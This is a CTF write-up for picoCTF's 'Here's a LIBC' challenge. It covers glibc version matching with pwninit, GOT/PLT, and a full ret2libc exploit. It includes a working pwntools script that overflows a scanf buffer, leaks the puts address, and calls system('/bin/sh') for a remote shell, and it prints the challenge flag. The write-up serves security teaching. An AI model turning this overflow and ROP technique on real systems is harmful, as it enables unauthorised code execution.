Here's a LIBC

In this writeup, I explain the solutions to the picoCTF Here’s a LIBC challenge.

As the title suggests, this is a ret2libc problem.

I’ll cover libc, pwninit, PLT & GOT, leaking addresses using Python generators and other topics as well.

Here’s a libc

file + checksec

They gave us a 64 bit ELF.

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e5dba3e6ed29e457cd104accb279e127285eecd0, not stripped

Here’s the checksec result.

checksec vuln
[*] "/picoctf/Here's_a_libc/vuln"
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    RUNPATH:    b'./'
    Stripped:   No

The source code isn’t provided this time.

I tried executing the file but it didn’t run.

./vuln
Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!

That’s a problem.

libc

Anyways, What exactly is a libc?

libc is the C standard library.

The functions we use a lot in C, such as printf, scanf, read… are all defined there.

There are a couple implementations of libc(glibc,musl…).

On linux though, when people say libc people usually refer to glibc.

As you can see, there’s a g prefix in glibc similar to GCC.

The g stands for 'GNU's Not Unix'.

Long story short GCC is used to make the executable(ELF) and glibc is the runtime environment the ELF relies on to work.

There are many versions of libc new versions get released twice a year.

We were also given a libc.so.6.

What is libc.so.6 ?

libc.so.6 is a symbolic link that refers to the glibc shared library on Linux.

Let’s check which version of libc it uses.

It’s glibc 2.27.

strings libc.so.6 | grep "GNU" 
GNU C Library (Ubuntu glibc 2.27-3ubuntu1.2) stable release version 2.27.
Compiled by GNU CC version 7.5.0.

Now that we know which version of libc picoCTF uses, we need to which version we’re using.

Run ldd on your *nix machine.

It’ll tell you which version of glibc you’re using.

ldd --version
ldd (Ubuntu glibc 2.39-0ubuntu8.5) 2.39
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

I’m using 2.39.

We probably couldn’t run the ELF file due to the mismatch of glibc versions.

The glibc my computer uses was much higher. 2.39 vs 2.27.

Let’s check which Ubuntu version the vuln file was built on.

You can use strings and grep to find which version of linux the ELF was made from.

strings vuln | grep "GCC:"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0

It looks like it’s Ubuntu 18.04.

Why did I check where the ELF file was built?

Well, if I know the Ubuntu version, I’ll probably know the libc version as well.

Ubuntu 18.04 uses glibc 2.27.

The simplest way to solve the glibc version mismatch issue is to get a hold of Ubuntu 18.04, because it uses glibc 2.27.

People usually use Docker to get their hands on different versions of Ubuntu.

If it’s your first time solving this problem, and don’t know what glibc is I don’t recommend using Dockerfiles.

You’ll be loaded with too much information on Docker and Dockerfiles.

You also have to learn Docker and Dockerfiles separately, which take time.

However, the next time you’re solving pwn challenges that requires you to use different glibc version, use Dockerfiles.

It’s more convenient than the way I’m introducing.

pwninit

I’ll be using pwninit for this writeup.

pwninit is written in Rust so you’ll have to install Rust first.

You also might have to pass the --locked flag when installing pwninit.

Otherwise it might not get installed.

Add the cargo bin to your PATH.

export PATH=$PATH:/home/your_name/.cargo/bin

You need to install patchelf.

sudo apt-get install patchelf

Then run pwninit in the directory where the vuln executable lives.

pwninit
bin: ./vuln
libc: ./libc.so.6
ld: ./ld-2.27.so

unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.27-3ubuntu1.2_amd64.deb
warning: failed unstripping libc: failed running eu-unstrip, please install elfutils: No such file or directory (os error 2)
copying ./vuln to ./vuln_patched
running patchelf on ./vuln_patched
writing solve.py stub

Let’s run vuln_patched.

Now it runs smoothly.

./vuln_patched 
WeLcOmE To mY EcHo sErVeR!
hwkim301
HwKiM301
^C

Exploit Explanation

Let’s check the file in IDA or Ghidra.

Here’s the main function.

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // rsp
  char v4; // al
  char *v5; // rdi
  const char **v6; // [rsp+0h] [rbp-80h] BYREF
  int v7; // [rsp+Ch] [rbp-74h]
  char v8[40]; // [rsp+10h] [rbp-70h] BYREF
  char *s; // [rsp+38h] [rbp-48h]
  __int64 v10; // [rsp+40h] [rbp-40h]
  unsigned __int64 v11; // [rsp+48h] [rbp-38h]
  __gid_t rgid; // [rsp+54h] [rbp-2Ch]
  unsigned __int64 i; // [rsp+58h] [rbp-28h]

  v7 = argc;
  v6 = argv;
  setbuf(_bss_start, 0);
  rgid = getegid();
  setresgid(rgid, rgid, rgid);
  v11 = 27;
  strcpy(v8, "Welcome to my echo server!");
  v10 = 26;
  v3 = alloca(32);
  s = (char *)&v6;
  for ( i = 0; i < v11; ++i )
  {
    v4 = convert_case(v8[i], i);
    s[i] = v4;
  }
  v5 = s;
  puts(s);
  while ( 1 )
    do_stuff(v5);
}

The convert_case function.

__int64 __fastcall convert_case(char a1, char a2)
{
  if ( a1 <= '`' || a1 > 122 )
  {
    if ( a1 <= 64 || a1 > 90 )
    {
      return (unsigned __int8)a1;
    }
    else if ( (a2 & 1) != 0 )
    {
      return (unsigned int)(unsigned __int8)a1 + 32;
    }
    else
    {
      return (unsigned __int8)a1;
    }
  }
  else if ( (a2 & 1) != 0 )
  {
    return (unsigned __int8)a1;
  }
  else
  {
    return (unsigned int)(unsigned __int8)a1 - 32;
  }
}

The program takes strings as input and converts cases in the odd indices of the string.

For example, only 'h', 'k', 'm' were converted in 'hwkim301'.

The do_stuff function.

int do_stuff()
{
  char v0; // al
  char v2; // [rsp+Fh] [rbp-81h] BYREF
  char s[112]; // [rsp+10h] [rbp-80h] BYREF
  __int64 v4; // [rsp+80h] [rbp-10h]
  unsigned __int64 i; // [rsp+88h] [rbp-8h]

  v4 = 0;
  __isoc99_scanf("%[^\n]", s);
  __isoc99_scanf("%c", &v2);
  for ( i = 0; i <= 0x63; ++i )
  {
    v0 = convert_case(s[i], i);
    s[i] = v0;
  }
  return puts(s);
}

The current code works as if it’s a gets function, taking input until a newline is received.

A BOF can be used to exploit the scanf function.

__isoc99_scanf("%[^\n]", s);

It should be fixed like this.

scanf("%112[^\n]", s);

Since the input buffer is 112 bytes, which is a multiple of 16,

I know that the return address will be at rbp+8.

char s[112]; // [rsp+10h] [rbp-80h] BYREF

Therefore the offset between the input buffer to the return address is rbp+8 - rbp-0x80 = 0x88 bytes.

Now we are able to overwrite the return address.

The problem is that there aren’t any execve or system syscalls in the binary itself.

We need to to three things in order to get a shell.

First, we need to find the libc base address.

Then, we need to return to the main function, where we can use that leaked address(libc base) for a BOF.

Finally we need to use system('/bin/sh') to pop a shell.

The libc base address is literally the memory address where libc gets mapped to the memory.

Even though, the program doesn’t contain execve or a system syscalls if we know the libc base address and the offset to a certain system function, it’ll let you call system('/bin/sh') since libc has a whole bunch of functions defined.

To do that we’ll have to use the GOT and PLT.

They’re both used exclusively in dynamic linked ELF files.

Dynamic linking is the default linking for ELF files so we won’t have to overthink whether GOT and PLT exist or not.

GOT & PLT

GOT (Global Offset Table)

The GOT is a table in the binary that stores the actual addresses of functions in shared libraries (like libc) at runtime.

When a function like puts is called, the program looks up its real address in the GOT.

PLT (Procedure Linkage Table)

The PLT is a set of stubs (small pieces of code) in the binary that jump to the addresses in the GOT.

When you call puts@plt, it uses the GOT to find where puts is in libc and jumps there.

You can use the PLT to call functions (like puts@plt) even if you don’t know their real addresses.

You can leak addresses from the GOT (like puts@got) to find the libc base address.

Once you have the libc base, you can calculate the address of any function in libc (like system or execve) and use it in your exploit.

Although the libc base changes every time, the offsets to the functions don’t.

Dynamic linking allows programs to use shared libraries (like libc) without knowing their exact memory addresses at compile time.

When a program calls a library function (like puts), it doesn’t know where that function will be in memory after the program is loaded.

When you call a function like puts, the call goes to puts@plt.

If it’s the first time calling the function, the PLT code asks the dynamic linker to find the real address of puts and stores it in the GOT.

After the first call, the PLT uses the address stored in the GOT to call the function directly (no more lookup needed).

1. Overwrite the return address

2. set rdi to puts@got.

This is where the address for puts is.

rdi now saves the address puts@got.

3. Use puts@plt

Since rdi is set up to puts@got by using puts() will be called with puts@GOT as the argument.

Therefore we will get puts@GOT which is the actual memory address.

I used puts because unlike other functions, setbuf or read in actually prints output to the screen, making it easier to capture the leaked address.

4. Then we get back to main.

We need to go back to the main function, because that’s where the only vulnerable code is and to exploit it we need to use it again.

5. Find the memory address that was leaked in libc.

Set a breakpoint in gdb and run vmmap.

You’ll see that the libc address all start with 0x7f…

0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw-

Here are the last couple of bytes after sending the payload.

b'\nAa...Ad\n0Z\x96\xfbG\x7f'

When puts prints a 64-bit address, it often doesn’t print a full 8 bytes if the leading bytes are null (\x00).

For example, an address like 0x00007fabcdef1234 would typically be printed as \x7f\xab\xcd\xef\x12\x34 by puts because puts stops printing at the first null byte it encounters.

By taking the last 6 bytes, you’re trying to capture the significant, non-null bytes of the leaked 64-bit address, assuming the first two bytes were 0x0000.

This is a common heuristic.

Since u64 works for 64 bit integers, we need to make it to 8 bytes using ljust.

Filling it up with null bytes should be enough.

leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

6. Find the libc base

Now that we know the memory address of puts we can calculate the libc base by subtracting it’s offset.

libc.address=leak-libc.symbols['puts']

7. call /bin/sh using the system function in libc.

Overwrite the return address set rdi to '/bin/sh' using the pop rdi, ret instruction.

Call the system function using libc.

ELF.search is used to search strings in an ELF or libc file.

Since it returns a generator, we can use next to grab the values it returns.

What’s a generator?

A generator in Python is a special type of iterator that allows you to create an iterable sequence of values on the fly, without storing the entire sequence in memory at once.

The stack needs to be 16 bit aligned. I explained why it has to be aligned in the guessing_game writeup.

To make it 16 bit aligned I passed a ret instruction.

payload2=b'A'*136
payload2+=p64(pop_rdi)
payload2+=p64(next(libc.search(b'/bin/sh')))
payload2+=p64(vuln_rop.find_gadget(['ret']).address)
payload2+=p64(libc.symbols['system'])

Exploit Code

from pwn import *

r = remote('mercury.picoctf.net', 1774)
e = ELF('./vuln')
libc = ELF('./libc.so.6')
vuln_rop = ROP(e)

pop_rdi = vuln_rop.find_gadget(['pop rdi', 'ret']).address
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = e.symbols['main']

payload = b'A' * 136
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b'WeLcOmE To mY EcHo sErVeR!', payload)
leak = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.info(f'{hex(leak)}')

libc.address = leak - libc.symbols['puts']
log.info(f'libc base: {hex(libc.address)}')
payload2 = b'A' * 136
payload2 += p64(pop_rdi)
payload2 += p64(next(libc.search(b'/bin/sh')))
payload2 += p64(vuln_rop.find_gadget(['ret']).address)
payload2 += p64(libc.symbols['system'])
r.sendline(payload2)


r.interactive()
# picoCTF{1_<3_sm4sh_st4cking_f2ac531bbb3a68ed}

Reference Writeup

My favorite write up is this one. It’s pretty detailed.

Here’s a libc#

file + checksec#

libc#

pwninit#

Exploit Explanation#

GOT & PLT#

Exploit Code#

Reference Writeup#